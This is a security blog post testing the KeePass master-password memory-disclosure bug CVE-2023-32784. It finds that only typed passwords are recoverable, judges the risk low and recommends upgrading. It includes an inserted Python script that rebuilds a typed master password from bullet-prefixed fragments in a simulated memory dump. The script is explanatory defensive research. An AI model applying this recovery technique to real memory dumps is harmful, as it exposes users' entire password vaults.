Password MisManagers

Password managers can be an important tool in any organization's security infrastructure. They let users keep a distinct credential for each application they use, and they let teams manage logins for shared tools without passing passwords around. However, password managers have been in the news recently for a number of security breaches.

LastPass, a popular cloud-based password manager, was the victim of a breach that exposed user password databases. Another popular password manager, KeePass, stores an encrypted password database either locally or on a network drive. It, too, has been subject to a recently disclosed vulnerability (CVE-2023-32784) that allows an attacker to recover the database's master password. It's important to note that this attack retrieves the password from memory rather than attacking the database file directly. It requires either a dump of the KeePass process while it is running (even if the workspace has since been locked), or a full memory dump of the host, which still works after the KeePass database has been closed.

I tested this vulnerability using the publicly available exploit KeePass 2.X Master Password Dumper. This tool scans a memory dump of the KeePass process and reassembles the password fragments left behind in running memory.

First, I wanted to see whether the master password could be obtained by simply opening the KeePass database.

The exploit could not retrieve the master password from a database that had merely been opened; it produced only junk output.

Next, I ran the exploit after pasting the master password into the unlock dialog and opening the database.

Again, the exploit returned only junk data.

Finally, running the exploit after typing the password in manually disclosed the master password, except for its first two characters.

Successful exploitation of this vulnerability (on KeePass versions before 2.54) relies on two criteria:

1. The attacker compromises a machine on which a KeePass database is open or has recently been closed, with enough access to dump process or system memory.

2. The user typed the master password rather than pasting it.
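As an added example, not code from the original post, from the KeePass project, or from the dumper tool named above, the following Python script recreates the recovery step on a constructed "memory dump" so the two criteria can be exercised offline. It assumes (from the public description of the bug, not from anything on this page) that each keystroke in the vulnerable password box left behind a string of bullet placeholders followed by the typed character, while a paste inserted the whole text at once and left no such fragments. The sample password, the filler bytes and every function name are made up for the example.

```python
"""
Added example (not the page's, KeePass's or the dumper tool's code): a toy
re-creation of the memory scan behind CVE-2023-32784 on a constructed dump.

Assumption taken from the public bug description, not from this page:
KeePass 2.X before 2.54 built the master password in its password box one
keystroke at a time, and keystroke n left a .NET string of (n-1) U+25CF
bullets followed by the typed character in memory. Pasting inserts the whole
text in one operation and leaves no per-keystroke fragments.
"""
import re

BULLET = "\u25cf"                          # the "●" placeholder the box displays

# Constructed filler so the scan has to find the fragments among other data.
NOISE = b"\x00" * 16 + "unrelated .NET string".encode("utf-16-le") + b"\xff" * 8


def simulate_typed_dump(password: str) -> bytes:
    """Stand-in for a process dump taken after the password was typed.
    Keystroke i (0-based) leaves BULLET*i + password[i]; the first keystroke
    therefore leaves a bare character with no marker in front of it."""
    fragments = [(BULLET * i + ch).encode("utf-16-le")
                 for i, ch in enumerate(password)]
    return NOISE + NOISE.join(fragments) + NOISE


def simulate_pasted_dump(password: str) -> bytes:
    """Stand-in for a dump taken after the password was pasted: only the
    all-bullet display string remains, no per-keystroke fragments."""
    return NOISE + (BULLET * len(password)).encode("utf-16-le") + NOISE


# One or more UTF-16LE bullets (b"\xcf\x25") followed by one UTF-16 code unit.
# DOTALL so "." also matches a 0x0a byte inside a character.
FRAGMENT_RE = re.compile(rb"((?:\xcf\x25)+)(..)", re.DOTALL)


def recover_master_password(dump: bytes) -> str:
    """Rebuild the typed password from leftover fragments in a dump.
    Returns "" if no fragments are found. Position 0 is always "?" because
    the first keystroke leaves no bullet-prefixed string; a position seen
    with several different characters is shown as {candidates}."""
    candidates: dict[int, set[str]] = {}
    for m in FRAGMENT_RE.finditer(dump):
        index = len(m.group(1)) // 2        # bullets before the char = its position
        try:
            ch = m.group(2).decode("utf-16-le")
        except UnicodeDecodeError:          # unpaired surrogate: not a keystroke
            continue
        if ch == BULLET or not ch.isprintable():
            continue                        # all-bullet display string, NULs, etc.
        candidates.setdefault(index, set()).add(ch)
    if not candidates:
        return ""
    out = []
    for i in range(max(candidates) + 1):
        cands = candidates.get(i)
        if i == 0 or not cands:
            out.append("?")
        elif len(cands) == 1:
            out.append(next(iter(cands)))
        else:
            out.append("{" + "".join(sorted(cands)) + "}")
    return "".join(out)


if __name__ == "__main__":
    secret = "Tr0ub4dor&3"                  # constructed sample master password
    print("typed :", recover_master_password(simulate_typed_dump(secret)))
    print("pasted:", repr(recover_master_password(simulate_pasted_dump(secret))))
```

Run as is, the typed case yields the password with only its first character unknown and the pasted case yields nothing, which is the behaviour described above. Against a real dump the same scan also has to cope with positions that were seen with several different characters (for example from an earlier, mistyped attempt); the script shows those in braces rather than guessing.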

While this vulnerability is rated high severity with a CVSS score of 7.5, in my opinion the risk it presents is low. Exploitation depends on a very specific set of circumstances, and the attacker must already have enough access to the host to dump memory, so it would not be a primary attack vector for an initial compromise, although an attacker with a foothold could use it to obtain every credential in the database and escalate from there. In addition, it can be defended against with compensating controls, or simply by updating to the most recent version of KeePass.

KeePass has released a new version, 2.54, that resolves this vulnerability, as seen in the video below. We recommend that anyone using KeePass update to the newest version, which is 2.57 at the time of publication.
